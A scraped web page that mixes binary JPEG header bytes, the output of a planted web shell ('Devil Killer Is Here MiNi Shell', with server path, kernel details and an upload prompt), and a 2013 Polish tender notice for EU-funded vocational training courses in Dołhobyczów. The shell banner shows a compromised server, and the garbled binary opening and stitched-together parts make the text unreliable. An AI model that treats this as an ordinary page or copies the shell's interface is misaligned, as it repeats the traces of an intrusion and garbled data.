JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130605/216764-N-2013.html

<p class="kh_header"><b>Dołhobyczów: Organizacja i przeprowadzenie usług szkoleniowych oraz doradztwa zawodowego 
i poradnictwa psychologicznego, w ramach projektu systemowego Chcę iść naprzód - Program wsparcia osób zagrożonych wykluczeniem społecznym</b><br>
<b>Numer ogłoszenia: 216764 - 2013; data zamieszczenia: 05.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Dołhobyczowie , ul. Spółdzielcza 8, 22-540 Dołhobyczów, woj. lubelskie, tel. 84 65 32 137, faks 84 65 32 137.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie usług szkoleniowych oraz doradztwa zawodowego 
i poradnictwa psychologicznego, w ramach projektu systemowego Chcę iść naprzód - Program wsparcia osób zagrożonych wykluczeniem społecznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Organizacja i przeprowadzenie usług szkoleniowych oraz doradztwa zawodowego i poradnictwa psychologicznego, w ramach projektu systemowego Chcę iść naprzód - Program wsparcia osób zagrożonych wykluczeniem społecznym współfinansowanego ze środków Unii Europejskiej Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
Zakres zamówienia obejmuje:
Część I. 
Zorganizowanie i przeprowadzenie kursu prawa jazdy kategorii B dla 14 osób w wymiarze 60 godzin (30 godzin edukacyjnych (po 45 min.) oraz 30 godzin zegarowych).
Miejsce przeprowadzenia szkolenia: Hrubieszów
Termin wykonania zadania: od 01 lipca 2013 r. do 15 listopada 2013r.
Wykonawca zapewni: 
odpowiednią salę wykładową wyposażoną w odpowiednie oprzyrządowanie techniczne, środki audiowizualne, tablicę, komputery, biurka i krzesła,
odpowiednie materiały szkoleniowe (podręczniki, płyta bądź pendrive), które staną się własnością kursantów,
zajęcia powinny być przeprowadzone przez osoby posiadające odpowiednie uprawnienia 
do wykładów i instruktora nauki jazdy kategorii B,
przeprowadzenie egzaminu wewnętrznego,
opłaci jeden egzamin państwowy na prawo jazdy w WORD dla uczestnika,
opłaci i przeprowadzi konieczne badania lekarskie dopuszczające kursantów do egzaminu (w tym psychologa),
prowadzenie szczegółowej dokumentacji zajęć, w tym w szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Część II. 
Kurs prawa jazdy kategorii C dla 2 osób
Miejsce szkolenia: Hrubieszów
Termin wykonania zadania: od 01 lipca 2013 r. do 15 listopada 2013 r.
Program szkolenia powinien być zgodny z obowiązującymi przepisami, tj. Ustawa o kierujących pojazdami z dnia 5 stycznia 2011 r. (Dz. U. z 2011 nr 30 poz. 151 z dnia 05.01.2011 z póżn. zm.) oraz z ustawą z dnia 20 czerwca 1997- Prawo Ruchu Drogowego (tekst jednolity z Dz.U. z 2005 Nr 108, poz. 908) oraz Rozporządzeniem Ministra Infrastruktury z dnia 27.10.2005 w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień  przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 Nr 217, poz.1834 z późn. zm.)
Wykonawca zapewni:
pomieszczenia w których odbywają się zajęcia muszą być wyposażone w sprzęt techniczno-dydaktyczny,
odpowiednie materiały szkoleniowe (podręczniki, płyta bądź pendrive), które staną się własnością kursantów,
zajęcia powinny być przeprowadzone przez osoby posiadające odpowiednie uprawnienia, w tym instruktora nauki jazdy kategorii C,
liczba godzin kursu powinna wynosić co najmniej 50 godzin, podzielona na część teoretyczna i praktyczną,
przeprowadzenie egzaminu wewnętrznego,
opłacenie jednego egzaminu państwowego na prawo jazdy w WORD dla uczestnika,
zorganizowanie i przeprowadzenie koniecznych badań lekarskich oraz psychologicznych,
prowadzenie szczegółowej dokumentacji zajęć, w tym w szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Część III.
Obsługa wózka widłowego jezdniowego z wymianą butli gazowej dla 9 osób
Miejsce szkolenia: Hrubieszów
Termin wykonania zadania: od 01 lipca 2013 r. do 15 listopada 2013 r.
Wykonawca zapewni:
przeprowadzenie 67 godzinnego kursu spełniającego wymagania do wydania uprawnień w zakresie kierowca-operator wózków jezdniowych podnośnikowych wraz z bezpieczną wymianą butli, kurs obejmować musi odpowiednio zagadnienia teoretyczne i praktyczne,
badania lekarskie,
przeprowadzenie zajęć teoretycznych i praktycznych przez osoby z odpowiednimi kwalifikacjami,
prowadzenie szczegółowej dokumentacji zajęć, w tym szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzające ukończenie kursu oraz zezwoleń na kierowanie wózkami jezdniowymi,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Część IV.
Kurs bukieciarstwa i florystyki dla 3 osób
Miejsce szkolenia w odległości nie większej niż 30 km od siedziby Zamawiającego.
Termin wykonania zadania: od 01 lipca 2013 r.  do 15 listopada 2013 r.
Wykonawca zapewni:
prowadzenie szczegółowej dokumentacji zajęć, w tym w szczególności dzienniki zajęć, listy obecności,
przeprowadzenie kursu przez osoby z odpowiednimi kwalifikacjami,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Program szkolenia obejmuje:
48 godzin szkolenia (9 edukacyjnych/teoretycznych i 39 zegarowych/praktycznych),
wiedzę na temat teorii barw i kompozycji florystycznych oraz zasad kompozycyjnych.
Zajęcia praktyczne powinny obejmować:
a)sztukę układania kwiatów w naczyniach;
b)dekorację kwiatów doniczkowych;
c)artystyczne pakowanie prezentów;
d)dekorację stołów;
e)florystykę ślubną;
f)florystykę żałobną.
Wykonawca zapewni odpowiedni materiał dydaktyczny, który po realizacji kursu stanie się własnością uczestników 150 zł/osobę  oraz obiad jednodaniowy (drugie danie) oraz kawę /herbatę, napoje, ciastka w łącznej cenie do 20 zł/osoba.
Część V.
Profesjonalny sprzedawca z obsługą kasy fiskalnej dla 9 osób 
Miejsce szkolenia: Dołhobyczów
Termin wykonania zadania: od 1 lipca 2013r. do 15 listopada 2013r.
Wykonawca zapewni:
56 godzin szkolenia,
przeprowadzenie kursu przez osoby z odpowiednimi kwalifikacjami,
pomieszczenia wyposażone w sprzęt techniczno-dydaktyczny /co najmniej 3 rodzaje kas fiskalnych/;
materiały szkoleniowo-dydaktyczne, które staną się własnością kursantów,
przeprowadzenie egzaminu sprawdzającego, a po uzyskaniu pozytywnego wyniku uczestnicy uzyskają zaświadczenia,
wykonawca zobowiązany jest prowadzić szczegółową dokumentację zajęć, w tym szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
wyżywienie dzienne w cenie do 20 zł tj. obiad gorący jednodaniowy-drugie danie i kawa, herbata, ciastka,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Część VI.
Kurs kosmetyczny dla 2 osób
Miejsce szkolenia: Hrubieszów
Termin wykonania zadania: od 01 lipca 2013 r. do 15 listopada 2013 r.
Wykonawca zapewni:
100 godzin szkolenia/13 dni  podzielonych na część teoretyczną i praktyczną,
pomieszczenia wyposażone w sprzęt techniczno-dydaktyczny,
materiały dydaktyczne /szkoleniowe do 150 zł na uczestnika,
przeprowadzenie kursu przez osoby z odpowiednimi kwalifikacjami,
zaświadczenia o ukończeniu kursu zgodnie z obowiązującymi przepisami prawa,
prowadzenie szczegółowej dokumentacji zajęć, w tym szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
obiad jednodaniowy(drugie danie) oraz kawę /herbatę, napoje, ciastka  w łącznej cenie do 20 zł/osoba,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Szkolenie powinno obejmować następujące zagadnienia:
pielęgnacja twarzy, ciała, oczu i dłoni,
makijaż dzienny i wieczorowy.
Część VII.
Organizacja warsztatów aktywizacyjnych oraz indywidualne i grupowe poradnictwo  psychologa a także określenie indywidualnej ścieżki zawodowej poprzez indywidualne oraz grupowe wsparcie doradcy zawodowego dla 20 osób w 2013 roku w terminie od 01 lipca 2013 r. do 30 sierpnia 2013 r. w związku z realizacją projektu pn. Chcę iść naprzód - Program wsparcia osób zagrożonych wykluczeniem społecznym w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Miejsce przeprowadzenia szkolenia: Dołhobyczów
Do obowiązku Wykonawcy w ramach świadczonej usługi należeć będzie: 
1)Zorganizowanie i przeprowadzenie warsztatów aktywizacyjnych wraz z indywidualnym i grupowym wsparciem aktywizacyjnym psychologa w roku 2013 r. w wymiarze:
zajęcia grupowe 16 godz.  szkoleniowych (2 dni).
Wykonawca zapewni odpowiedni materiał dydaktyczny (podręczniki, płyta bądź pendrive), który po realizacji kursu stanie się własnością uczestników   oraz wyżywienie dzienne w cenie do 20 zł t. j. obiad gorący jednodaniowy - drugie danie i  kawa, herbata, ciastka,
indywidualne wsparcie 2 godz./ osoba t. j. 40 godz.,
przeprowadzenie warsztatów przez osoby z odpowiednimi kwalifikacjami,
pomieszczenia wyposażone w sprzęt techniczno-dydaktyczny,
wykonawca zobowiązany jest prowadzić szczegółową dokumentację zajęć, w tym szczególności dzienniki zajęć, 
po zakończeniu warsztatów wykonawca dostarczy zamawiającemu kopie dokumentacji warsztatów oraz kopie zaświadczeń potwierdzających ukończenie warsztatów,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
W ramach warsztatów aktywizacyjnych uczestnicy projektu nabędą wiedzę na temat sposobów rozwiązywania problemów, nabiorą pewności siebie w kontaktach interpersonalnych oraz poznają własne kompetencje społeczne. Odbędą sesje grupowe w formie programów ukierunkowanych na rozwój kompetencji formułowania i realizacji celów zawodowych 
i prywatnych, projektowania własnego wizerunku, zdrowego trybu życia problematyki równości płci w miejscu pracy i życiu codziennym - wsparcie indywidualne psychologa.
2)Zorganizowanie i przeprowadzenie warsztatów aktywizacyjnych wraz z indywidualnym i grupowym wsparciem aktywizacyjnym doradcy zawodowego w roku 2013 r. w wymiarze:
wsparcie indywidualne 2 godz./ osoba tj. 40 godz.  
zajęcia grupowe 16 godz. szkoleniowych (2 dni).  
Wykonawca zapewni odpowiedni materiał dydaktyczny (podręczniki, płyta bądź pendrive), który po realizacji kursu stanie się własnością uczestników  oraz wyżywienie dzienne w cenie do 20 zł tj. obiad gorący jednodaniowy-drugie danie i  kawa, herbata, ciastka,
przeprowadzenie warsztatów przez osoby z odpowiednimi kwalifikacjami,
pomieszczenia wyposażone w sprzęt techniczno-dydaktyczny,
wykonawca zobowiązany jest prowadzić szczegółową dokumentację zajęć, w tym  szczególności dzienniki zajęć, 
po zakończeniu warsztatów wykonawca dostarczy zamawiającemu kopie dokumentacji warsztatów oraz kopie zaświadczeń potwierdzających ukończenie warsztatów,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Określenie indywidualnej ścieżki zawodowej poprzez indywidualne wsparcie doradcy zawodowego 2 godz.. Indywidualna praca z doradcą zawodowym określi odpowiedni kurs dla uczestnika projektu. W ramach wsparcia grupowego  doradca zawodowy  pomoże uczestnikom w dotarciu do pracodawcy odpowiadającego ich predyspozycjom poprzez realizację narzędzi diagnostycznych oraz pozwoli na poznanie nowoczesnych narzędzi przeszukiwania ofert pracy w celu zwiększania możliwości podjęcia zatrudnienia. Uczestnicy projektu posiądą również umiejętność napisania listu motywacyjnego, życiorysu oraz zaprezentowania się podczas rozmowy kwalifikacyjnej -16 godz.
W ramach realizacji części zamówienia (I - VI) Wykonawca zobowiązuje się do:
1.Opracowania szczegółowych programów szkoleń/zajęć (z podziałem na każde z ww zadań), które będą obejmowały m. in.: nazwę i zakres szkolenia,zajęć, czas trwania i sposób organizacji szkolenia,zajęć, cele szkolenia,zajęć, plan nauczania określający tematy zajęć w określonych  zadaniach oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej, wykaz niezbędnych środków i materiałów dydaktycznych, imienną listę trenerów skierowanych 
do przeprowadzenia szkoleń,zajęć i szczegółowych harmonogramów szkoleń/zajęć oraz przedłożenia ich do zaakceptowania Zamawiającemu nie później niż 7 dni od dnia zawarcia umowy (chyba, że strony ustalą termin krótszy).
2.Przeprowadzenia szkoleń,zajęć zgodnie z ww. harmonogramami szkoleń,zajęć 
i szczegółowymi programami szkoleń,zajęć. 
3.Zapewnienia, iż osoby prowadzące szkolenia,zajęcia będą dysponowały wiedzą 
i kwalifikacjami niezbędnymi do jego przeprowadzenia.
4.Zapewnienia zastępstwa w przypadkach, kiedy wybrany wykładowca nie będzie mógł z przyczyn obiektywnych poprowadzić szkolenia,zajęć.
5.Wyznaczenia osoby do kontaktu z Zamawiającym, odpowiedzialnej za dbałość o wysoką jakość zajęć i upoważnionej do podejmowania wiążących decyzji w kwestiach związanych z realizowanymi szkoleniami.
6.Przygotowania i przekazania bezzwrotnych materiałów szkoleniowych: podręczników, skryptów w wersji papierowej oraz w wersji elektronicznej zapisanej na płycie CD-R lub pendrive w ilości odpowiadającej liczbie szkolonych osób (po 1 egzemplarzu materiałów szkoleniowych dla każdego uczestnika danego szkolenia) niezbędnych do prawidłowego przebiegu szkoleń i przygotowania do testu końcowego, a nadto jeden dodatkowy egzemplarz opracowanych materiałów przeznaczonych dla Zamawiającego.
7.Sprawowania nadzoru i udzielania niezbędnej pomocy i wskazówek w trakcie prowadzenia szkoleń/zajęć.
8.Zapewnienia m.in. urządzeń do prezentacji multimedialnej (rzutników, laptopów) 
dla prowadzących zajęcia/szkolenia.
9.Systematycznego i prawidłowego przygotowania i prowadzenia dokumentacji 
ze szkoleń/zajęć, w tym m. in. list obecności, kart doradczych, dzienników szkoleń (uwzględniających m. in. dni, godziny, liczbę osób oraz tematykę zrealizowanych zajęć, podpisy prowadzących zajęcia), list potwierdzających odbiór materiałów szkoleniowych, list potwierdzających odbiór posiłków a także zaświadczeń o ukończeniu szkolenia, z podaniem daty odbioru i czytelnym podpisem uczestnika.
10.Przeprowadzenia wśród uczestników szkoleń ankiet ewaluacyjnych dotyczących oceny efektywności szkolenia (ankietyzacja przed i po zakończeniu szkolenia).
11.Przekazania zamawiającemu w terminie do 7 dni od dnia zakończenia szkolenia/zajęć 
w poszczególnych grupach:
-list obecności uczestników szkoleń/zajęć,
-list odbioru przez uczestników materiałów szkoleniowych oraz zaświadczeń o ukończeniu szkolenia/zajęć, z podaniem daty odbioru i czytelnym podpisem uczestnika;
-dzienników szkoleń/zajęć; 
-kopii wszystkich wydanych uczestnikom zaświadczeń o ukończeniu szkolenia;
-ankiet ewaluacyjnych dotyczących oceny efektywności szkolenia;
oraz wszelkiej innej dokumentacji wytworzonej w trakcie realizacji zamówienia.
12.Sporządzenia protokołu zdawczo - odbiorczego dotyczącego wykonania przedmiotu zamówienia w terminie 7 dni od dnia zakończenia szkolenia ostatniej grupy.
13.Oznakowania pomieszczeń, w których będą odbywały się zajęcia oraz dokumentacji wytworzonej w ramach realizacji niniejszego zamówienia poprzez umieszczenie informacji o współfinansowaniu szkoleń ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, logotypów PO KL, EFS, UE, zgodnie z aktualnymi Wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki oraz Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
14. Dołożenia należytej staranności przy wykonywaniu umowy. 
W ramach realizacji części zamówienia VII Wykonawca zobowiązuje się do:
1.Rejestracji instytucji szkoleniowej w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej www.inwestycjawkadry.pl i aktualizowanie w tej bazie informacji o każdym szkoleniu otwartym organizowanym w ramach Projektu nie rzadziej niż raz w miesiącu. 
2.Rejestracji informacji o szkoleniu i terminach rekrutacji w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej www.pociagdokariery.pl i aktualizacji w tej bazie informacji o każdym szkoleniu otwartym organizowanym w ramach Projektu nie rzadziej niż raz w miesiącu. 
3.Zapewnienia cateringu na czas trwania szkoleń w postaci kawy,  herbaty, napojów zimnych oraz ciastek.
4.Przygotowania konspektu zajęć i przedłożenie go zamawiającemu w terminie do 10 dni od rozpoczęcia szkoleń 
5.Opracowania i przedłożenia sprawozdania z realizacji usługi określającego podział kosztów.
6.Opracowania indywidualnych planów działania przez doradcę zawodowego dla uczestników szkolenia określających indywidualną ścieżkę zawodową.  
7.Opracowania indywidualnych kart wsparcia psychologa oraz doradcy zawodowego zawierających informację dotyczącą rodzaju udzielonego wsparcia oraz liczby godzin które zostały zrealizowane.
8.Opracowania dokumentów określających indywidualną ścieżkę zawodową.
9.Wykonania szczegółowego programu szkoleń oraz przedłożenia go zamawiającemu 
w terminie do 10 dni od rozpoczęcia szkoleń.  
10.Opracowania miesięcznych  harmonogramów szkoleń i dostarczenia ich zamawiającemu do 3 dnia każdego miesiąca lecz przed rozpoczęciem  realizacji  szkolenia. 
11.Realizacji szkoleń po zatwierdzeniu przez Zamawiającego harmonogramu szkoleń. 
12.W przypadku braku akceptacji przedłożonego harmonogramu Wykonawca opracuje nowy harmonogram z uwzględnieniem uwag Zamawiającego. 
13.Zapewnienia sali szkoleniowej o odpowiedniej wielkości na terenie Dołhobyczowa z wyposażeniem w rzutnik multimedialny, komputer, papier do flipczartu, flipczart. 
14.Zapewnienia warunków pracy zgodnie z przepisami bhp w trakcie trwania szkolenia. 
15.Zapewnienia uczestnikom szkolenia odpowiednich materiałów szkoleniowych (tzn. materiały szkoleniowe związane z tematyką  szkolenia, zeszyty, materiały piśmienne, teczkę na dokumenty- aktówkę), które po zakończeniu szkolenia przejdą w posiadanie uczestników i Zamawiającego w celu dokumentacji prawidłowości realizacji usługi oznakowane w logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego GOPS oraz umieszczać informację o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego.
16.Oznakowania pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczać znaki: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Projektu systemowego GOPS oraz umieszczać informację o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego.
17.Zapewnienia prelegentów/trenerów z kompetencjami odpowiednimi  do prowadzenia warsztatów i  ćwiczeń w przedmiotowym zakresie, oraz przedłożenia w/w dokumenty zamawiającemu przed rozpoczęciem szkoleń 
18.Wystawienia uczestnikom szkolenia zaświadczenia/certyfikatu o ukończeniu szkolenia zawierających informację o jego temacie oraz wymiarze godzin, oraz przedłożenia ich kopii zamawiającemu. 
19.Zorganizowania szkolenia w pełnym wymiarze czasu szkoleń, przeprowadzenia ewaluacji szkolenia - dokonania oceny szkolenia za pomocą ankiet ewaluacyjnych.
20.Przedłożenia  przed rozpoczęciem szkolenia harmonogramu szkolenia oraz 
po zakończeniu szkoleń listy obecności uczestników na zajęciach w poszczególnych dniach szkolenia oraz listy poświadczających odbiór materiałów dydaktycznych, a także innych dokumentów potwierdzających organizację i prowadzenie szkolenia w sposób należyty, w szczególności ankiet wypełnionych przez uczestników szkolenia, dzienników zajęć, oraz informacji o ewaluacji szkolenia.
21.Prowadzenia dokumentacji wykonanych usług zgodnie z zasadami dokumentowania działań wykonywanych w projektach finansowanych przez Europejski Fundusz Społeczny.
22.Wykonawca zobowiązany jest do umieszczenia na zaświadczeniach o ukończeniu szkolenia poniższej informacji: Szkolenie w ramach projektu systemowego współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego POKL, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej pn. Chcę iść naprzód - Program wsparcia osób zagrożonych wykluczeniem społecznym oraz ologowania zaświadczeń, list, materiałów dydaktycznych symbolami: logo UE z podpisem Unia Europejska, logo EFS, PO KL.
23.Zamawiający zastrzega sobie prawo dokonywania kontroli realizacji zamówienia.
24.Opracowania przez psychologa i doradcy zawodowego ankiet określających:
-nabycie przez uczestników projektu kompleksowej wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia,
-zdobycie nowych / podniesienie lub udoskonalenie już posiadanych kwalifikacji zawodowych
-nabycie kwalifikacji zawodowych, 
-nabycie kompetencji psycho-społecznych. 
25.Przeprowadzenia w/w ankiet na początku i na końcu szkoleń. 
26.Dokumentowania uczestnictwa w szkoleniu poprzez wykonywanie fotografii podczas szkoleń.
Wykonawca zobowiązany będzie do wykonania przedmiotu zamówienia zgodnie 
z obowiązującymi przepisami prawa, wytycznymi programowymi i Instytucji Wdrażającej, zaakceptowanym przez Zamawiającego harmonogramem szkoleń, a także do podejmowania wszelkich działań zgodnie z najlepszą wiedzą i z zachowaniem należytej staranności, pozwalającej osiągnąć założone cele i rezultaty projektu..</p>

